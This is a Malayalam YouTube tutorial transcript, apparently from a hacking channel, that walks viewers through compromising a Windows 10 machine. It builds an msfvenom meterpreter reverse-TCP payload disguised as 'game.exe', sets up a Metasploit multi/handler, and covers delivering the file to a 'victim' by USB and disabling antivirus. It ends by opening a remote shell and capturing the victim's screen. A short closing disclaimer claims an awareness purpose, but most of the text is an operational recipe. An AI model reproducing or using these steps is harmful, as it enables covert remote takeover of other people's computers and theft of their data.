ഹലോ ഗായ്സ്, വെൽക്കം ബാക്ക് ടു മൈ ചാനൽ. കഴിഞ്ഞ വീഡിയോയിൽ നമ്മൾ മെറ്റാസ്പ്ലോയിറ്റ് ഫ്രെയിംവർക്ക് എന്ന ടൂളിൻ്റെ ഫംഗ്ഷൻസും കാര്യങ്ങളുമൊക്കെ പറഞ്ഞിരുന്നു അല്ലേ? സോ അതോടുകൂടി നമ്മൾ ബേസിക് ആയിട്ടുള്ള എല്ലാ കാര്യങ്ങളും കംപ്ലീറ്റ് ചെയ്തിരിക്കുകയാണ്. സോ ഇന്നത്തെ വീഡിയോയിൽ നമ്മൾ വിൻഡോസ് 10 ഹാക്ക് ചെയ്യാൻ പോവുകയാണ്. ഓക്കെ, ഒരു സിസ്റ്റം ഇന്ന് നമ്മൾ ഹാക്ക് ചെയ്യാൻ പോവുകയാണ്. സോ ഗായ്സ്, ലെറ്റ്സ് ഗെറ്റ് സ്റ്റാർട്ടഡ്. ഓക്കെ ഗായ്സ്, ആദ്യം ടെർമെക്സ് അപ്ഡേറ്റ് ചെയ്യുക. അതിനുശേഷം മെറ്റാസ്പ്ലോയിറ്റ് ഓപ്പൺ ചെയ്യാനായി MSF കൺസോൾ എന്ന കമാൻഡ് കൊടുക്കുക. ഓക്കെ, മെറ്റാസ്പ്ലോയിറ്റ് ഇവിടെ ഓപ്പൺ ആയിട്ടുണ്ട്. സോ നമുക്കിനി ചെയ്യേണ്ടത് നമ്മുടെ വിക്ടിമിന് അയച്ചു കൊടുക്കാൻ വേണ്ടിയുള്ള പേലോഡ് സെറ്റ് ചെയ്യണം. ഓക്കെ, പേലോഡൊക്കെ എന്താണെന്ന് കഴിഞ്ഞ വീഡിയോയിൽ ഞാൻ പറഞ്ഞിട്ടുണ്ടായിരുന്നു. സോ ആ വീഡിയോ നിങ്ങൾ കണ്ടിട്ടില്ലെങ്കിൽ ആ വീഡിയോ കണ്ടതിന് ശേഷം മാത്രം ഈ വീഡിയോ കാണുക, ഇല്ലെങ്കിൽ നിങ്ങൾക്ക് ഒന്നും മനസ്സിലായില്ല. ഓക്കെ, സോ ഗൈസ്, ആ വീഡിയോയുടെ ലിങ്ക് ഞാൻ ഡിസ്ക്രിപ്ഷനിലും ഐ ബട്ടണിലും കൊടുത്തേക്കാം. ഓക്കെ ഗൈസ്, അപ്പോൾ നമുക്ക് വിക്ടിമിന് കൊടുക്കാനുള്ള പേലോഡ് സെറ്റ് ചെയ്യാം. സോ അതിനായി നമ്മൾ യൂസ് ചെയ്യുന്ന കമാൻഡാണ് MSF venom. ഓക്കെ, MSF venom -p എന്ന് കൊടുക്കുക. P for payload. അടുത്തതായി നമ്മൾ ഹാക്ക് ചെയ്യാൻ പോകുന്നത് വിൻഡോസ് ആണ്. സോ MSF venom -p വിൻഡോസ് എന്ന് കൊടുക്കുക. ഓക്കെ, /meterpreter/reverse_TCP. അതിനുശേഷം lhost കൊടുക്കുക. ഓക്കെ, lhost എന്ന് വെച്ചാൽ നമ്മളുടെ IP അഡ്രസ്സ് ആണ്. നമ്മുടെ IP അഡ്രസ്സ് അറിയാൻ ജസ്റ്റ് ടെർമെക്സിൻ്റെ ലെഫ്റ്റിൽ നിന്നും റൈറ്റിലേക്ക് സ്ലൈഡ് ചെയ്യുക. അവിടെ ന്യൂ സെഷനിൽ ക്ലിക്ക് ചെയ്യുക. ഇപ്പോൾ വന്നിരിക്കുന്ന വിൻഡോയിൽ ifconfig എന്ന് കൊടുക്കുക. അപ്പോൾ അവിടെ IP അഡ്രസ്സ് വരും. സോ അതവിടെ പേസ്റ്റ് ചെയ്യുക. ഓക്കെ, അപ്പോൾ MSF venom -p windows/meterpreter/reverse/TCP lhost നമ്മളുടെ IP അഡ്രസ്സ് സ്പേസ് lport ഏതെങ്കിലും ഒരു 4 ഡിജിറ്റ് നമ്പർ കൊടുക്കുക. ഞാൻ ഇവിടെ 4444 ആണ് കൊടുത്തിരിക്കുന്നത്. അതിനുശേഷം -f എന്ന് കൊടുക്കുക. ഓക്കെ, f എന്ന് വെച്ചാൽ ഫോർമാറ്റ്. നമ്മൾ വിൻഡോസിൽ യൂസ് ചെയ്യുന്ന ഫോർമാറ്റ് exe ആണ്. സോ f ശേഷം exe എന്ന് കൊടുക്കുക. അതിനുശേഷം -o ഫോർ ഔട്ട്പുട്ട്. എന്തെങ്കിലും ഒരു പേര് കൊടുക്കുക. ഞാനിപ്പോൾ game.exe എന്ന് കൊടുക്കുന്നു. അതിനുശേഷം എൻ്റർ അടിക്കുക. ഇപ്പോൾ പേലോഡ് ഇവിടെ ക്രിയേറ്റ് ചെയ്യും. ഓക്കെ ഗൈസ്, ഇതാണ് നമ്മുടെ പേലോഡ്. ഓക്കെ, ഇനി ഇത് സെറ്റ് ചെയ്യണം. സോ അതിനായി യൂസ് multi/handler എന്ന് കൊടുക്കുക. ഇവിടെ നമ്മുടെ പേലോഡ് ആദ്യം സെറ്റ് ചെയ്യണം. സോ നമ്മൾ മുമ്പേ അടിച്ച കമാൻഡ് അതേപോലെ കൊടുക്കുക. സെറ്റ് പേലോഡ് windows/meterpreter/reverse_TCP എന്ന് കൊടുത്ത് എൻ്റർ അടിക്കുക. അടുത്തതായി നമ്മുടെ IP അഡ്രസ്സ് സെറ്റ് ചെയ്യണം. സോ അതിനായി സെറ്റ് lhost സ്പേസ് IP അഡ്രസ്സ് കൊടുക്കുക. ശേഷം lport സെറ്റ് ചെയ്യാനായി സെറ്റ് lport എന്ന് കൊടുത്ത് നമ്മൾ പേലോഡ് ക്രിയേറ്റ് ചെയ്തപ്പോൾ കൊടുത്ത അതേ പോർട്ട് നമ്പർ തന്നെ കൊടുക്കുക. ഓക്കെ, ഇപ്പോൾ ഇവിടെ ഷോ ഓപ്ഷൻസ് എന്നൊരു കമാൻഡ് കൊടുത്താൽ അവിടെ നമ്മൾ സെറ്റ് ചെയ്തിട്ടുള്ള എല്ലാ ഡീറ്റെയിൽസും കാണാൻ കഴിയും. സോ ഇനി ഇതൊന്ന് റൺ ചെയ്യുകയേ വേണ്ടൂ. ഓക്കെ, അതിനു മുമ്പ് നമ്മൾ ക്രിയേറ്റ് ചെയ്ത പേലോഡ് വിക്ടിമിൻ്റെ സിസ്റ്റത്തിലേക്ക് ഇൻജെക്റ്റ് ചെയ്യണം. അത് നിങ്ങൾ എങ്ങനെയാണോ ചെയ്യുന്നത് അതുപോലെ. ചിലപ്പോൾ പെൻഡ്രൈവിൽ കയറ്റിയാവാം, അല്ലെങ്കിൽ മെമ്മറി കാർഡിലാവാം. അത് എങ്ങനെയായാലും കുഴപ്പമില്ല, വിക്ടിമിൻ്റെ കമ്പ്യൂട്ടറിൽ ആ മാൽവെയർ കയറണം. ഓക്കെ, അതുപോലെ തന്നെ മെയിനായിട്ടൊരു കാര്യം, കമ്പ്യൂട്ടറിൻ്റെ ആൻറ്റിവൈറസ് ഒക്കെ ഓഫ് ചെയ്ത് വെക്കണം. ആൻറ്റിവൈറസും ഫയർവാളും ഒക്കെ ഓഫ് ആണെങ്കിൽ മാത്രമേ ഇത് വർക്കാവൂ. ഓക്കെ, ഇനി ടെർമെക്സിൽ ഈ കമാൻഡ് റൺ ചെയ്യിക്കാനായി ജസ്റ്റ് റൺ എന്ന് കൊടുക്കുക, അല്ലെങ്കിൽ എക്സ്പ്ലോയിറ്റ് എന്ന് കൊടുക്കുക. അതിനുശേഷം കമ്പ്യൂട്ടറിൽ ആ പേലോഡ് ഓപ്പൺ ചെയ്യുക. കുറച്ച് ടൈം വെയിറ്റ് ചെയ്യുമ്പോൾ നമുക്ക് ആ സിസ്റ്റത്തിലേക്കുള്ള ആക്സസ് കിട്ടും. യെസ് ഗായ്സ്, നമുക്ക് ആക്സസ് കിട്ടി. സോ നേരത്തെ ഞാൻ പറഞ്ഞിരുന്നു മീറ്റർപ്രെറ്റർ എന്താണെന്ന് പറയാമെന്ന്. ഓക്കെ, അതൊന്നുമല്ല, നമ്മുടെ ഈ ഷെല്ലാണ്. സിസ്റ്റം ഇപ്പോൾ കംപ്ലീറ്റ്ലി നമ്മുടെ കയ്യിലാണ്. ഇനി ഇത് കൺട്രോൾ ചെയ്യാനുള്ളതെല്ലാം മീറ്റർപ്രെറ്റർ എന്ന ഈ ഷെല്ലിൽ നിന്നാണ് ചെയ്യുന്നത്. ഓക്കെ, നമുക്കിവിടെ ഹെൽപ്പ് അടിച്ചു കഴിഞ്ഞാൽ ഒരുപാട് കമാൻഡ്സ് കാണാൻ കഴിയും. സോ നമുക്ക് ഇപ്പോൾ എന്തെങ്കിലും ഒരു ഫയൽ ഡൗൺലോഡ് ചെയ്യണമെങ്കിൽ ഡൗൺലോഡ് ചെയ്യാം, സ്ക്രീൻഷോട്ട് എടുക്കണമെങ്കിൽ എടുക്കാം. ആ ഒരു കമ്പ്യൂട്ടറിൻ്റെ ഫുൾ ആക്സസ് നമുക്ക് കിട്ടി. ഇപ്പോൾ ഞാനിവിടെ സ്ക്രീൻഷോട്ട് എന്ന കമാൻഡ് കൊടുക്കുകയാണ്. സോ അത് നമ്മുടെ ഫോണിൽ സേവ് ആയിട്ടുണ്ട്. നമുക്ക് നോക്കാം.
യെസ്, ദേ നമ്മുടെ സ്ക്രീൻഷോട്ട് അവിടെ കിടക്കുന്നു. സോ ഇപ്പോൾ നിങ്ങൾക്ക് മനസ്സിലായില്ലേ എങ്ങനെയാണ് ഒരു സിസ്റ്റം അല്ലെങ്കിൽ ഒരു ഫോൺ ഹാക്ക് ആവുന്നതെന്ന്. സോ ഇതുകൊണ്ടാണ് പറയുന്നത് വെറുതെ കണ്ണി കണ്ട ലിങ്ക് ഒന്നും ക്ലിക്ക് ചെയ്യരുതെന്ന്. സോ ഇതൊരിക്കലും ഒരാളെ ബ്ലാക്ക്മെയിൽ ചെയ്യാനോ അല്ലെങ്കിൽ ഒരാളെ ഹാക്ക് ചെയ്യാനോ ഒന്നുമല്ല ഞാൻ വീഡിയോ ഇടുന്നത്. ഇത് കാണുന്ന നിങ്ങൾ ഓരോരുത്തരെയും ഇതിൻ്റെ സീരിയസ്നെസ് പറഞ്ഞ് മനസ്സിലാക്കുകയാണ്, നിങ്ങളെ അവെയർ ചെയ്യിക്കുകയാണ്. ഓക്കെ, സോ നിങ്ങളിപ്പോൾ ചെന്ന് ഒരാളെ ഹാക്ക് ചെയ്തിട്ട് പണി വാങ്ങിച്ചു കൂട്ടിയാൽ ഞാനോ എൻ്റെ ചാനലോ ഉത്തരവാദി ആയിരിക്കില്ല. ഓക്കെ, സോ ഗൈസ്, ഇന്നത്തെ വീഡിയോ ഇവിടെ വെച്ച് വൈൻഡപ്പ് ചെയ്യുന്നു. വീഡിയോ ഇഷ്ടപ്പെട്ടാൽ ലൈക്ക് ചെയ്യുക. ഇനിയും വരാനിരിക്കുന്ന വീഡിയോസിൻ്റെ നോട്ടിഫിക്കേഷൻ കിട്ടാനായി ചാനൽ സബ്സ്ക്രൈബ് ചെയ്ത് ബെൽ ഐക്കൺ എനേബിൾ ചെയ്യുക. തുടർന്നുള്ള വീഡിയോസിൽ നമ്മൾ ഇതിനെക്കുറിച്ച് കൂടുതൽ പഠിക്കുന്നതായിരിക്കും. സോ പുതിയ വീഡിയോയുമായി ഞാൻ വീണ്ടും വരുന്നതുവരെ എല്ലാവർക്കും ഗുഡ് ബൈ.